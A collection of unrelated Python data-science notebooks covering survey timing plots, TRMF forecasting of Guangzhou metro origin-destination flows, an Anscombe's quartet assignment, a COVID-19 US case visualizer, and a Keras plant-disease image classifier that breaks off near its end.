success_plot(34, axes[0])
success_plot(35, axes[1])
success_plot(36, axes[2])
success_plot(37, axes[3])
axes[3].set_xlabel("Fraction of Tests")
# -
def tot_plot(task, ax):
filters = (
(data["Subtask #"].isin(task_mapping[task])) &
(data["Time on task"] < 100)
)
df = data[filters]
sns.distplot(df["Time on task"], ax=ax, rug=True, hist=False, kde_kws={"shade": True})
ax.set_yticklabels([])
ax.set_title("Kernel density estimation")
ax.set_xlim(0, 100)
ax.set_xlabel("")
ax.set_title(f"Task #{task}")
# +
fig, axes = plt.subplots(nrows=4, figsize=(6, 12), sharex=True)
tot_plot(34, axes[0])
tot_plot(35, axes[1])
tot_plot(36, axes[2])
tot_plot(37, axes[3])
axes[3].set_xlabel("Time on Task (s)")
# -
|
surveys/2018-09-jupytercon-2018/jupyterlab_test/jupyterlab-test.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# + [markdown] pycharm={"name": "#%% md\n"}
# Temporal regularized matrix factorization (TRMF) for metro OD forecasting. Code is adapted from [https://github.com/xinychen/transdim](https://github.com/xinychen/transdim).
#
# Original paper for TRMF:
# - <NAME>, <NAME>, <NAME>, 2016. Temporal regularized matrix factorization for high-dimensional time series prediction. 30th Conference on Neural Information Processing Systems (NIPS 2016).
#
# # Define functions
# +
from functions import *
from numpy.linalg import inv as inv
import random
import time
def reset_random_seeds(n=1):
os.environ['PYTHONHASHSEED'] = str(n)
np.random.seed(n)
random.seed(n)
def ar4cast(theta, X, time_lags, multi_step):
dim, rank = X.shape
d = time_lags.shape[0]
X_new = np.append(X, np.zeros((multi_step, rank)), axis = 0)
for t in range(multi_step):
X_new[dim + t, :] = np.einsum('kr, kr -> r', theta, X_new[dim + t - time_lags, :])
return X_new
def TRMF(dense_mat, sparse_mat, init_para, init_hyper, time_lags, maxiter):
"""Temporal Regularized Matrix Factorization, TRMF."""
## Initialize parameters
W = init_para["W"]
X = init_para["X"]
theta = init_para["theta"]
## Set hyperparameters
lambda_w = init_hyper["lambda_w"]
lambda_x = init_hyper["lambda_x"]
lambda_theta = init_hyper["lambda_theta"]
eta = init_hyper["eta"]
dim1, dim2 = sparse_mat.shape
pos_train = np.where(sparse_mat != 0)
pos_test = np.where((dense_mat != 0) & (sparse_mat == 0))
binary_mat = sparse_mat.copy()
binary_mat[pos_train] = 1
d, rank = theta.shape
for it in range(maxiter):
## Update spatial matrix W
for i in range(dim1):
pos0 = np.where(sparse_mat[i, :] != 0)
Xt = X[pos0[0], :]
vec0 = Xt.T @ sparse_mat[i, pos0[0]]
mat0 = inv(Xt.T @ Xt + lambda_w * np.eye(rank))
W[i, :] = mat0 @ vec0
## Update temporal matrix X
for t in range(dim2):
pos0 = np.where(sparse_mat[:, t] != 0)
Wt = W[pos0[0], :]
Mt = np.zeros((rank, rank))
Nt = np.zeros(rank)
if t < np.max(time_lags):
Pt = np.zeros((rank, rank))
Qt = np.zeros(rank)
else:
Pt = np.eye(rank)
Qt = np.einsum('ij, ij -> j', theta, X[t - time_lags, :])
if t < dim2 - np.min(time_lags):
if t >= np.max(time_lags) and t < dim2 - np.max(time_lags):
index = list(range(0, d))
else:
index = list(np.where((t + time_lags >= np.max(time_lags)) & (t + time_lags < dim2)))[0]
for k in index:
Ak = theta[k, :]
Mt += np.diag(Ak ** 2)
theta0 = theta.copy()
theta0[k, :] = 0
Nt += np.multiply(Ak, X[t + time_lags[k], :]
- np.einsum('ij, ij -> j', theta0, X[t + time_lags[k] - time_lags, :]))
vec0 = Wt.T @ sparse_mat[pos0[0], t] + lambda_x * Nt + lambda_x * Qt
mat0 = inv(Wt.T @ Wt + lambda_x * Mt + lambda_x * Pt + lambda_x * eta * np.eye(rank))
X[t, :] = mat0 @ vec0
## Update AR coefficients theta
for k in range(d):
theta0 = theta.copy()
theta0[k, :] = 0
mat0 = np.zeros((dim2 - np.max(time_lags), rank))
for L in range(d):
mat0 += X[np.max(time_lags) - time_lags[L] : dim2 - time_lags[L] , :] @ np.diag(theta0[L, :])
VarPi = X[np.max(time_lags) : dim2, :] - mat0
var1 = np.zeros((rank, rank))
var2 = np.zeros(rank)
for t in range(np.max(time_lags), dim2):
B = X[t - time_lags[k], :]
var1 += np.diag(np.multiply(B, B))
var2 += np.diag(B) @ VarPi[t - np.max(time_lags), :]
theta[k, :] = inv(var1 + lambda_theta * np.eye(rank) / lambda_x) @ var2
X_new = ar4cast(theta, X, time_lags, multi_step)
mat_new = W @ X_new[- multi_step :, :].T
mat_hat = W @ X.T
mat_hat = np.append(mat_hat, mat_new, axis = 1)
return mat_hat, W, X_new, theta
def update_x_partial(sparse_mat, W, X, theta, lambda_x, eta, time_lags, back_step):
d = time_lags.shape[0]
dim2, rank = X.shape
tmax = np.max(time_lags)
for t in range(dim2 - back_step, dim2):
pos0 = np.where(sparse_mat[:, t] != 0)
Wt = W[pos0[0], :]
Mt = np.zeros((rank, rank))
Nt = np.zeros(rank)
if t < tmax:
Pt = np.zeros((rank, rank))
Qt = np.zeros(rank)
else:
Pt = np.eye(rank)
Qt = np.einsum('ij, ij -> j', theta, X[t - time_lags, :])
if t < dim2 - np.min(time_lags):
if t >= tmax and t < dim2 - tmax:
index = list(range(0, d))
else:
index = list(np.where((t + time_lags >= tmax) & (t + time_lags < dim2)))[0]
for k in index:
Ak = theta[k, :]
Mt += np.diag(Ak ** 2)
theta0 = theta.copy()
theta0[k, :] = 0
Nt += np.multiply(Ak, X[t + time_lags[k], :]
- np.einsum('ij, ij -> j', theta0, X[t + time_lags[k] - time_lags, :]))
vec0 = Wt.T @ sparse_mat[pos0[0], t] + lambda_x * Nt + lambda_x * Qt
mat0 = inv(Wt.T @ Wt + lambda_x * Mt + lambda_x * Pt + lambda_x * eta * np.eye(rank))
X[t, :] = mat0 @ vec0
return X
def TRMF_partial(dense_mat, sparse_mat, init_para, init_hyper, time_lags, maxiter):
## Initialize parameters
W = init_para["W"]
X = init_para["X"]
theta = init_para["theta"]
## Set hyperparameters
lambda_x = init_hyper["lambda_x"]
eta = init_hyper["eta"]
back_step = 10 * multi_step
for it in range(maxiter):
X = update_x_partial(sparse_mat, W, X, theta, lambda_x, eta, time_lags, back_step)
X_new = ar4cast(theta, X, time_lags, multi_step)
mat_hat = W @ X_new[- multi_step :, :].T
mat_hat[mat_hat < 0] = 0
return mat_hat, W, X_new, theta
def TRMF_forecast(dense_mat, sparse_mat, init_hyper, pred_step, multi_step, rank, time_lags, maxiter, maxiter2=10):
dim1, T = dense_mat.shape
d = time_lags.shape[0]
start_time = T - pred_step
results = {step + 1: np.zeros((dim1, pred_time_steps)) for step in range(multi_step)}
for t in range(pred_time_steps):
if t == 0:
init_para = {"W": 0.1 * np.random.randn(dim1, rank),
"X": 0.1 * np.random.randn(start_time, rank),
"theta": 0.1 * np.random.randn(d, rank)}
mat, W, X_new, theta = TRMF(dense_mat[:, 0 : start_time], sparse_mat[:, 0 : start_time],
init_para, init_hyper, time_lags, maxiter)
X_new = X_new[0: (start_time + t), :]
else:
init_para = {"W": W, "X": X_new, "theta": theta}
mat, W, X_new, theta = TRMF_partial(dense_mat[:, 0 : start_time + t],
sparse_mat[:, 0 : start_time + t],
init_para, init_hyper, time_lags, maxiter2)
X_new = X_new[0: (start_time + t), :]
for step in range(multi_step):
results[step+1][:, t] = mat[:, -multi_step+step]
if (t + 1) % 36 == 0:
print('Time step: {}'.format(t + 1))
return results
# + [markdown] pycharm={"name": "#%% md\n"}
# # Import data
# + jupyter={"outputs_hidden": false} pycharm={"name": "#%%\n"}
data0 = loadmat('..//data//OD_3m.mat')
data0 = data0['OD']
data0 = remove_weekends(data0, start=5)
train_idx = start_end_idx('2017-07-03', '2017-08-11', weekend=False, night=False)
test_idx = start_end_idx('2017-08-14', '2017-08-25', weekend=False, night=False)
num_s = 159
# Subtract the mean in the training set
data = data0.astype(np.float64)
data_mean = data[:, train_idx].reshape([num_s * num_s, 36, -1], order='F')
data_mean = data_mean.mean(axis=2)
for i in range(65):
data[:, i * 36:(i + 1) * 36] = data[:, i * 36:(i + 1) * 36] - data_mean
# + [markdown] pycharm={"name": "#%% md\n"}
# # Parameter tuning
# # Tune weights
# + jupyter={"outputs_hidden": false} pycharm={"name": "#%%\n"}
multi_step = 1
pred_time_steps = 36 * 10 + (multi_step - 1)
train_data = data[:, train_idx]
time_lags = np.array([1, 2, 3, 4, 5, 6, 7, 8, 9, 10])
d = time_lags.shape[0]
maxiter = 100
# Tune weights
eta = 0.03
rank = 40
rmse_list = []
weights = [500, 1000, 1500, 2000, 2500, 3000]
start = time.time()
reset_random_seeds(1)
for weight in weights:
init_hyper = {"lambda_w": weight, "lambda_x": weight, "lambda_theta": weight, "eta": eta}
results = TRMF_forecast(train_data, train_data, init_hyper, pred_time_steps, multi_step, rank, time_lags, maxiter, maxiter2=10)
rmse_list.append(RMSE(train_data[:, -36 * 10:], results[1]))
print('weight={}, time={}'.format(weight, time.time()-start))
print(rmse_list)
print(rmse_list)
best_weight = weights[np.argmin(rmse_list)]
print('best_weight is {}'.format(best_weight)) # was 3000
# + [markdown] pycharm={"name": "#%% md\n"}
# ## Tune rank
# + jupyter={"outputs_hidden": false} pycharm={"name": "#%%\n"}
init_hyper = {"lambda_w": best_weight, "lambda_x": best_weight, "lambda_theta": best_weight, "eta": eta}
rmse_list = []
ranks = range(30, 100, 10)
reset_random_seeds(1)
for rank in ranks:
results = TRMF_forecast(train_data, train_data, init_hyper, pred_time_steps, multi_step, rank, time_lags, maxiter, maxiter2=10)
rmse_list.append(RMSE(train_data[:, -36 * 10:], results[1]))
print("rank={}, time={}".format(rank, time.time()-start))
print(rmse_list)
print(rmse_list)
best_rank = ranks[np.argmin(rmse_list)]
print("best_rank is {}".format(best_rank)) # was 35
# + [markdown] pycharm={"name": "#%% md\n"}
# # Forcast and save results
# + jupyter={"outputs_hidden": false} pycharm={"name": "#%%\n"}
multi_step = 3
pred_time_steps = 36 * 10 + (multi_step - 1)
train_data = data[:, np.concatenate([train_idx, test_idx])]
time_lags = np.array([1, 2, 3, 4, 5, 6, 7, 8, 9, 10])
maxiter = 200
init_hyper = {"lambda_w": best_weight, "lambda_x": best_weight, "lambda_theta": best_weight, "eta": eta}
reset_random_seeds(1)
results = TRMF_forecast(train_data, train_data, init_hyper, pred_time_steps, multi_step, best_rank, time_lags, maxiter, maxiter2=10)
mat_hat1 = results[1][:, 2:2 + 360].copy()
mat_hat2 = results[2][:, 1:1 + 360].copy()
mat_hat3 = results[3][:, 0:0 + 360].copy()
for i in range(mat_hat1.shape[1]):
mat_hat1[:, i] += data_mean[:, i % 36]
mat_hat2[:, i] += data_mean[:, i % 36]
mat_hat3[:, i] += data_mean[:, i % 36]
real_OD = data0[:, test_idx]
real_flow = od2flow(real_OD, num_s=num_s)
print('Results of 1-step forecasting:')
predict_flow1 = od2flow(mat_hat1, num_s=num_s)
get_score(real_OD, mat_hat1, real_flow, predict_flow1)
print('Results of 2-step forecasting:')
predict_flow2 = od2flow(mat_hat2, num_s=num_s)
get_score(real_OD, mat_hat2, real_flow, predict_flow2)
print('Results of 3-step forecasting:')
predict_flow3 = od2flow(mat_hat3, num_s=num_s)
get_score(real_OD, mat_hat3, real_flow, predict_flow3)
# + jupyter={"outputs_hidden": false} pycharm={"name": "#%%\n"}
np.savez_compressed('..//data//Guangzhou_OD_TRMF_step1.npz', data=mat_hat1)
np.savez_compressed('..//data//Guangzhou_OD_TRMF_step2.npz', data=mat_hat2)
np.savez_compressed('..//data//Guangzhou_OD_TRMF_step3.npz', data=mat_hat3)
|
Experiments/Guangzhou_TRMF.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# <br>
#
# # Anscombes Quartet - Assignment for Fundamentals of Data Analysis<br>
#
# <br>
# ### Introduction
#
# The Anscombes Quartet is composed of four datasets. Each of the datasets are made up of eleven (x,y) points. These datasets are made up of nearly identical simple descriptive statistics. When the figures are analysed it is expected that if they are plotted they would all have a similar look. However, Anscombe's four datasets, when plotted, look completely different.
# 
# ### Background
#
# The Anscombe's Quartet was created by statistician [<NAME>](https://en.wikipedia.org/wiki/Frank_Anscombe) (13 May 1918 – 17 October 2001) in 1973. Anscombes was an English statistician whose interests included statistical computing. He felt it was essential that a computer had the ability to make both calculations and graphs. To emphasise the importance of graphing data he created the four datasets which are now known as [Anscombe's Quartet](https://en.wikipedia.org/wiki/Anscombe%27s_quartet).
#
# Anscombe realized that statistics cannot fully depict any data set. He felt that statistics while great for trends and data, did not present a realistic picture of the data. Statistically data may look the same, but when it is plotted using diagrams and graphs it can look completely different.
#
# In 1973 Anscombe published a paper entitled "Graphs in Statistical Analysis". It was in this paper that he presented the Quartet dataset. He first presented the table of numbers *(see dataset below)*. This dataset contained four distinct datesets. Each dataset had statistical properties which were essentially identical. The mean value of the "x" values are 9.0. The mean value of the "y" values are 7.5. They all have nearly identical variances, correlations, and regression lines. But when they are graphed the are completly different from each other.
#
# The datasest shows that statistics may tell you a lot about data, but they don't tell you everything needed, therefore it is essential that all data is also plotted to get a true picture of the results.
#
# ### Anscombe's Quartet
# Anscombe's Quartet datasets is illustrated below. As can be seen the 'x' values for x1, x2 and x3 are identical. The 'y' values are similar to each other. When they are plotted, as seen in the four graphs below they look completely different.
#
# 
# +
# To plot the four datasets
#Import matplotlib & numpy to plot the 4 datasets
import matplotlib.pyplot as plt
import numpy as np
# Dataset value as x and y
x = np.array([10, 8, 13, 9, 11, 14, 6, 4, 12, 7, 5])
y1 = np.array([8.04, 6.95, 7.58, 8.81, 8.33, 9.96, 7.24, 4.26, 10.84, 4.82, 5.68])
y2 = np.array([9.14, 8.14, 8.74, 8.77, 9.26, 8.10, 6.13, 3.10, 9.13, 7.26, 4.74])
y3 = np.array([7.46, 6.77, 12.74, 7.11, 7.81, 8.84, 6.08, 5.39, 8.15, 6.42, 5.73])
x4 = np.array([8, 8, 8, 8, 8, 8, 8, 19, 8, 8, 8])
y4 = np.array([6.58, 5.76, 7.71, 8.84, 8.47, 7.04, 5.25, 12.50, 5.56, 7.91, 6.89])
def fit(x):
return 3 + 0.5 * x
xfit = np.array([np.min(x), np.max(x)])
# Dataset 1 - x1 & y1
plt.subplot(221)
plt.plot(x, y1, 'bo', xfit, fit(xfit), 'r-', lw=2)
plt.axis([2, 20, 2, 14])
plt.setp(plt.gca(), xticklabels=[], yticks=(4, 8, 12), xticks=(0, 10, 20))
plt.text(3, 12, 'x1 y1', fontsize=14)
# Dataset 2 - x2 & y2
plt.subplot(222)
plt.plot(x, y2, 'bo', xfit, fit(xfit), 'r-', lw=2)
plt.axis([2, 20, 2, 14])
plt.setp(plt.gca(), xticks=(0, 10, 20), xticklabels=[],
yticks=(4, 8, 12), yticklabels=[], )
plt.text(3, 12, 'x2 y2', fontsize=14)
# Dataset 3 - x3 & y3
plt.subplot(223)
plt.plot(x, y3, 'bo', xfit, fit(xfit), 'r-', lw=2)
plt.axis([2, 20, 2, 14])
plt.text(3, 12, 'x3 y3', fontsize=14)
plt.setp(plt.gca(), yticks=(4, 8, 12), xticks=(0, 10, 20))
# Dataset 4 - x4 & y4
plt.subplot(224)
xfit = np.array([np.min(x4), np.max(x4)])
plt.plot(x4, y4, 'bo', xfit, fit(xfit), 'r-', lw=2)
plt.axis([2, 20, 2, 14])
plt.setp(plt.gca(), yticklabels=[], yticks=(4, 8, 12), xticks=(0, 10, 20))
plt.text(3, 12, 'x4 y4', fontsize=14)
plt.tight_layout()
# -
# ## The Statistics of Anscombe's Quartet
#
# When Anscombe's Quartet Datasets are statistically calculated the results of all four datasets are very similar. This can be seen in the analysis below.
# ### Mean
# The Mean of an array of numbers is also known as the average number. It is calculated by adding all the numbers in the array and dividing by the number of values in the array.
#
# This is the mathematical definition:
# 
#
#
# In Ansombe's datasets the Mean of the 'x' values are 9.0 and the Mean of the 'y' values are 7.5. The **numpy.mean** function has been used to calculate the mean values. The results can be seen below.
#
import numpy as np # to find the mean of the x values of the dataset
ax = (x), (x4)
np.mean(ax)
ay = (y1), (y2), (y3), (y4) # to find the mean of the y values of the dataset
np.mean(ay)
# ### Variance
#
# Variance is used to measure how far an array of numbers are spread. It describes the difference of a random variable from its expected value. It is defined as the average of the squares of the differences between the individual and the expected value.
#
# This is the mathematical definition:
# 
#
# In Ansombe's datasets the Variance of the 'x' values is 10.0 and the Variance of the 'y' values are 3.75. The **numpy.var** function has been used to calculate the variance. The results can be seen below.
ax = (x), (x4) # to find the Variance of the x values of the dataset
np.var(ax)
az = (y1), (y2), (y3), (y4) # to find the Variance of the y values of the dataset
np.var(az)
# ### Standard Deviation
#
# The Standarad Deviation (SD) is used to measure the spread of the values in a distribution. It is calculated as the square root of the variance.
#
# This is the mathematical definition:
# 
#
#
# In Ansombe's datasets, the Standard Deviation of the 'x' values is 3.16 and the Variance of the 'y' values are 1.93. The **numpy.std** function has been used to calulcate the standard deviation. The results can be seen below.
#
np.std(ax) # to find the Standard Deviation of the x values of the dataset
np.std(az) # to find the Standard Deviation of the y values of the dataset
# ### Correlation & the Correlation Coefficient
#
# Correlation is used in statistics to show whether and how strongly pairs of variables are related.
#
# The main result of a correlation is called the correlation coefficient (or "r"). Ranges are from -1.0 to +1.0. The closer r is to +1 or -1, the more closely the two variables are related.
#
# If r is close to 0, it means there is no relationship between the variables.
#
# If r is positive, it means that if one of the variables increases the other variable also increases.
#
# If r is negative it means that is one variable increases the other variable gets smaller. This is also known as the "inverse" correlation.
#
# The below plots illustrate the differences in r:
#
# 
#
#
# Pearson's correlation technique works best with linear relationships, as are found in Anscombe's Quartet. As one variable gets larger the other gets proportionately larger (or smaller).
#
# 
#
# In Ansombe's datasets, the Correlation Coefficient of the (x, y) values is 0.82. The **numpy.corrcoef** function has been used to calulcate the correlation coefficient. The results can be seen below.
#
np.corrcoef(x, y1) # The correlation coefficient of dataset (x1 y1)
np.corrcoef(x, y2) # The correlation coefficient of dataset (x2 y2)
np.corrcoef(x, y3) # The correlation coefficient of dataset (x3 y3)
np.corrcoef(x4, y4) # The correlation coefficient of dataset (x4 y4)
# Below is a summary of some of the main statistics relating to Anscombe's Quartet Dataset:
# Verify Mean, Standard Deviation, Coefficient
pairs = (x, y1), (x, y2), (x, y3), (x4, y4)
for x, y in pairs:
print('mean=%1.2f, std=%1.2f, r=%1.2f' % (np.mean(y), np.std(y), np.corrcoef(x, y)[0][1]))
# ## Conclusion
#
# Anscombe's Dataset is interesting because it shows how statistics, while great for describing trends and aspects of data, do not give a full picture of what the data actually is. While the four data sets have several identical statistical properties when they are illustrated using graphs and plotting they are vastly different from one another.
#
# The four data sets have the same mean of x, mean of y, variance in x and variance in y, standard deviation and correlation coefficient as calculated above. If you look at the four graphs which illustrate the datasets above, they are quite different from one another.
#
# The four data sets do have the same linear regression.
# - Graph 1 (x1 y1) is a scatter plot that moves in an approximate linear manner.
# - Graph 2 (x2 y2), above, when plotted is a curvature.
# - Graph 3 (x3 y3) is diagonal except for one point which is far away from all the other points.
# - Graph 4 (x4 y4) is vertical except for one point which is also far away from all the other points.
#
# This shows the while the datasets numerically and statistically look similar when plotted they are nothing alike. This proves that statistics cannot fully depict any dataset. It is important to always plot datasets to ensure accurate results.
# ## References
# https://en.wikipedia.org/wiki/Frank_Anscombe<br>
# https://en.wikipedia.org/wiki/Anscombe%27s_quartet<br>
# https://rstudio-pubs-static.s3.amazonaws.com/52381_36ec82827e4b476fb968d9143aec7c4f.html<br>
# https://medium.com/ibm-data-science-experience/markdown-for-jupyter-notebooks-cheatsheet-386c05aeebed<br>
# https://en.wikipedia.org/wiki/Anscombe%27s_quartet<br>
# https://heapanalytics.com/blog/data-stories/anscombes-quartet-and-why-summary-statistics-dont-tell-the-whole-story<br>
# https://www.youtube.com/watch?v=xlD8FIM5biA<br>
# https://wikivisually.com/wiki/Anscombe%27s_quartet<br>
# https://www.mathwarehouse.com/statistics/what-is-anscombes-quartet.php<br>
# https://matplotlib.org/gallery/specialty_plots/anscombe.html<br>
# http://www3.wabash.edu/econometrics/econometricsbook/Chapters/Ch05InterpretingRegression/ExcelFiles/Anscombe.xls <br>
# https://www.twilio.com/blog/2017/10/basic-statistics-python-numpy-jupyter-notebook.html<br>
# https://www.statsdirect.com/help/basic_descriptive_statistics/standard_deviation.html <br>
# https://www.surveysystem.com/correlation.htm <br>
# https://www.statisticshowto.datasciencecentral.com/probability-and-statistics/correlation-coefficient-formula/<br>
# https://en.wikipedia.org/wiki/Pearson_correlation_coefficient<br>
#
#
|
anscombes.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # COVIDvu - US regions visualizer <img src='resources/American-flag.png' align = 'right'>
# ---
# ## Runtime prerequisites
# +
# %%capture --no-stderr requirementsOutput
displayRequirementsOutput = False
# %pip install -r requirements.txt
from covidvu.utils import autoReloadCode; autoReloadCode()
# -
if displayRequirementsOutput:
requirementsOutput.show()
# ---
# ## Pull latest datasets from the JH CSSE GitHub repository
#
# This function is `crontab` ready; it can be called from here, the command line, or as a system job.
# + language="bash"
# ./refreshdata
# -
# ---
# ## Confirmed, deaths, recovered datasets
# +
import os
import pandas as pd
from covidvu.pipeline.vujson import parseCSSE
pd.options.mode.chained_assignment = None
# -
casesByStateUS = parseCSSE('confirmed')['casesUSStates']
casesByRegionUS = parseCSSE('confirmed')['casesUSRegions']
# ---
# ## Cases by US state
# +
from ipywidgets import fixed
from ipywidgets import interact
from ipywidgets import widgets
from covidvu import visualize
# -
statesUS = list(casesByStateUS.columns)
multiState = widgets.SelectMultiple(
options=statesUS,
value=['!Total US'],
description='State',
disabled=False
)
log = widgets.Checkbox(value=False, description='Log scale')
# ### Confirmed cases
interact(visualize.plotTimeSeriesInteractive,
df=fixed(casesByStateUS),
selectedColumns=multiState,
log=log,
yLabel=fixed('Total confirmed cases'),
title=fixed('COVID-19 total confirmed cases in US states')
);
def viewTopStates(n):
return pd.DataFrame(casesByStateUS.iloc[-1,:].sort_values(ascending=False).iloc[1:n]).style.background_gradient(cmap="Reds")
interact(viewTopStates, n=widgets.IntSlider(min=1, max=len(statesUS), step=1, value=5));
# ---
# ## Cases by US region
regionsUS = list(casesByRegionUS.columns)
multiRegion = widgets.SelectMultiple(
options=regionsUS,
value=['!Total US'],
description='State',
disabled=False
)
interact(visualize.plotTimeSeriesInteractive,
df=fixed(casesByRegionUS),
selectedColumns=multiRegion,
log=log,
yLabel=fixed('Total confirmed cases'),
title=fixed('COVID-19 total confirmed cases in US regions')
);
# ---
# © the COVIDvu Contributors. All rights reserved.
|
work/COVIDvu-US.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# + [markdown] _uuid="1020827e241ac87ffdf8e0f8762a6885bdc28fbc"
# Import neccessary packages
# + _uuid="8f2839f25d086af736a60e9eeb907d3b93b6e0e5" _cell_guid="b1076dfc-b9ad-4769-8c92-a6c4dae69d19"
import numpy as np
import pickle
import cv2
from os import listdir
from sklearn.preprocessing import LabelBinarizer
from keras.models import Sequential
from keras.layers.normalization import BatchNormalization
from keras.layers.convolutional import Conv2D
from keras.layers.convolutional import MaxPooling2D
from keras.layers.core import Activation, Flatten, Dropout, Dense
from keras import backend as K
from keras.preprocessing.image import ImageDataGenerator
from keras.optimizers import Adam
from keras.preprocessing import image
from keras.preprocessing.image import img_to_array
from sklearn.preprocessing import MultiLabelBinarizer
from sklearn.model_selection import train_test_split
import matplotlib.pyplot as plt
# + _uuid="7c3354a78e21a1a62ad0c4689d0ab3238fb760d4"
EPOCHS = 25
INIT_LR = 1e-3
BS = 32
default_image_size = tuple((256, 256))
image_size = 0
directory_root = '../input/plantvillage/'
width=256
height=256
depth=3
# + [markdown] _uuid="2bf7ac0a0b805946f844a48e55d5281403e53f57"
# Function to convert images to array
# + _uuid="c9c3e60b13ace6c8f3e54336e12f9970fde438a3"
def convert_image_to_array(image_dir):
try:
image = cv2.imread(image_dir)
if image is not None :
image = cv2.resize(image, default_image_size)
return img_to_array(image)
else :
return np.array([])
except Exception as e:
print(f"Error : {e}")
return None
# + [markdown] _uuid="24d42b87fad54a9556f78357ce673cc5152468c1"
# Fetch images from directory
# + _uuid="bb8d4c343314028f52ae3c3a840478a834a16c95"
image_list, label_list = [], []
try:
print("[INFO] Loading images ...")
root_dir = listdir(directory_root)
for directory in root_dir :
# remove .DS_Store from list
if directory == ".DS_Store" :
root_dir.remove(directory)
for plant_folder in root_dir :
plant_disease_folder_list = listdir(f"{directory_root}/{plant_folder}")
for disease_folder in plant_disease_folder_list :
# remove .DS_Store from list
if disease_folder == ".DS_Store" :
plant_disease_folder_list.remove(disease_folder)
for plant_disease_folder in plant_disease_folder_list:
print(f"[INFO] Processing {plant_disease_folder} ...")
plant_disease_image_list = listdir(f"{directory_root}/{plant_folder}/{plant_disease_folder}/")
for single_plant_disease_image in plant_disease_image_list :
if single_plant_disease_image == ".DS_Store" :
plant_disease_image_list.remove(single_plant_disease_image)
for image in plant_disease_image_list[:200]:
image_directory = f"{directory_root}/{plant_folder}/{plant_disease_folder}/{image}"
if image_directory.endswith(".jpg") == True or image_directory.endswith(".JPG") == True:
image_list.append(convert_image_to_array(image_directory))
label_list.append(plant_disease_folder)
print("[INFO] Image loading completed")
except Exception as e:
print(f"Error : {e}")
# + [markdown] _uuid="35c4b76d33e0263523e479657580104532f81d6e"
# Get Size of Processed Image
# + _uuid="6ee1ad9c422f112ec2862699b5c0f68b8d658123"
image_size = len(image_list)
# + [markdown] _uuid="905b41b226f3fd82a88e67821eb42a07f24b31f7"
# Transform Image Labels uisng [Scikit Learn](http://scikit-learn.org/)'s LabelBinarizer
# + _uuid="904ff893fe14f5060dd9e7be2ccf96ec793597e5"
label_binarizer = LabelBinarizer()
image_labels = label_binarizer.fit_transform(label_list)
pickle.dump(label_binarizer,open('label_transform.pkl', 'wb'))
n_classes = len(label_binarizer.classes_)
# + [markdown] _uuid="f860c29a1d714f06d25e6a0c5bca94739e5d24cc"
# Print the classes
# + _uuid="0f876397c40c3c8aa09772a92fd60481fc9ba268"
print(label_binarizer.classes_)
# + _uuid="6cd9c977b3d164a5570a0c24fdd8624adb9d56b8"
np_image_list = np.array(image_list, dtype=np.float16) / 225.0
# + _uuid="9f4829560fdfa218cee18c1cfb2eb9452ef180e5"
print("[INFO] Spliting data to train, test")
x_train, x_test, y_train, y_test = train_test_split(np_image_list, image_labels, test_size=0.2, random_state = 42)
# + _uuid="eec8afa64e676d52c814fc8e096955a60f13b6c5"
aug = ImageDataGenerator(
rotation_range=25, width_shift_range=0.1,
height_shift_range=0.1, shear_range=0.2,
zoom_range=0.2,horizontal_flip=True,
fill_mode="nearest")
# + _cell_guid="79c7e3d0-c299-4dcb-8224-4455121ee9b0" _uuid="d629ff2d2480ee46fbb7e2d37f6b5fab8052498a"
model = Sequential()
inputShape = (height, width, depth)
chanDim = -1
if K.image_data_format() == "channels_first":
inputShape = (depth, height, width)
chanDim = 1
model.add(Conv2D(32, (3, 3), padding="same",input_shape=inputShape))
model.add(Activation("relu"))
model.add(MaxPooling2D(pool_size=(3, 3)))
model.add(Dropout(0.25))
model.add(Conv2D(64, (3, 3), padding="same"))
model.add(Activation("relu"))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(0.25))
model.add(Flatten())
model.add(Dense(128))
model.add(Activation("relu"))
model.add(BatchNormalization())
model.add(Dropout(0.5))
model.add(Dense(n_classes))
model.add(Activation("softmax"))
# + [markdown] _uuid="53b13c03e4cea6dc2453a84e254b806ebeed2d99"
# Model Summary
# + _uuid="1e1523a834fbf872940171fbdefb3dcce2b5f31b"
model.summary()
# + _uuid="b21dffee32c325136b4ea23ac511049723f34a24"
opt = Adam(lr=INIT_LR, decay=INIT_LR / EPOCHS)
# distribution
model.compile(loss="binary_crossentropy", optimizer=opt,metrics=["accuracy"])
# train the network
print("[INFO] training network...")
# + _uuid="1a13efc5ded339fc3c0d9e61041e8ca555362db0"
history = model.fit_generator(
aug.flow(x_train, y_train, batch_size=BS),
validation_data=(x_test, y_test),
steps_per_epoch=len(x_train) // BS,
epochs=EPOCHS, verbose=1
)
# + [markdown] _uuid="1495fea08b37e4d4293f975ba30e6c1fc7a85ed9"
# Plot the train and val curve
# + _uuid="0af5e0f23657a4effc2d21cf8e840e81f42ec8e7"
acc = history.history['acc']
val_acc = history.history['val_acc']
loss = history.history['loss']
val_loss = history.history['val_loss']
epochs = range(1, len(acc) + 1)
#Train and validation accuracy
plt.plot(epochs, acc, 'b', label='Training accurarcy')
plt.plot(epochs, val_acc, 'r', label='Validation accurarcy')
plt.title('Training and Validation accurarcy')
plt.legend()
plt.figure()
#Train and validation loss
plt.plot(epochs, loss, 'b', label='Training loss')
plt.plot(epochs, val_loss, 'r', label='Validation loss')
plt.title('Training and Validation loss')
plt.legend()
plt.show()
# + [markdown] _uuid="9ca1a4489bd624c69a13cd37c0c2306ac8de55c2"
# Model Accuracy
# + _uuid="bb44f3d0b7e2862bc7d1a032612ebfd48212c1fe"
print("[INFO] Calculating model accuracy")
scores = model.evaluate(x_test, y_test)
print(f"Test Accuracy: {scores[1]*100}")
# + [markdown] _uuid="2a1f759db8afe933e62fe4cf8332cb303bb11be8"
# Save model using Pickle
# + _uuid="5cdf06adf492d79ed28fbdc36e02ad7489c7b33e"
